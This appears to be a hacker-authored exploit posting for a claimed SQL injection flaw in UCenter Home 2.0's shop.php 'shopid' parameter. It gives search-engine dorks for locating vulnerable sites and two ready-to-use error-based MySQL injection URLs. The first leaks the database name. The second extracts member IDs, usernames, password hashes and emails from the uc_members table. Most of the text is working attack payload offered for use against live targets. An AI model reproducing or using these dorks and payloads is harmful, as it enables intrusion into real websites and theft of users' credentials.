__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__

*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Script : UCenter Home
Version : 2.0
Script HomePage : http://u.discuz.net/

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Dork : Powered by UCenter inurl:shop.php?ac=view
Dork 2 : inurl:shop.php?ac=view&shopid=

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Vuln file : Shop.php
Values : (?)ac=view&shopid=
Vulnerable Style : SQL Injection (MySQL Error Based)
Needed Materials : Hex Conversion

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

You need the victim database name.

for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

..

DB : Okay.
Edit the DB name : `[TARGET DB NAME]`
Example : 'hiwir1_ucenter'
Edit : Okay.
Use hex conversion, and edit your SQL injection exploit.

Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1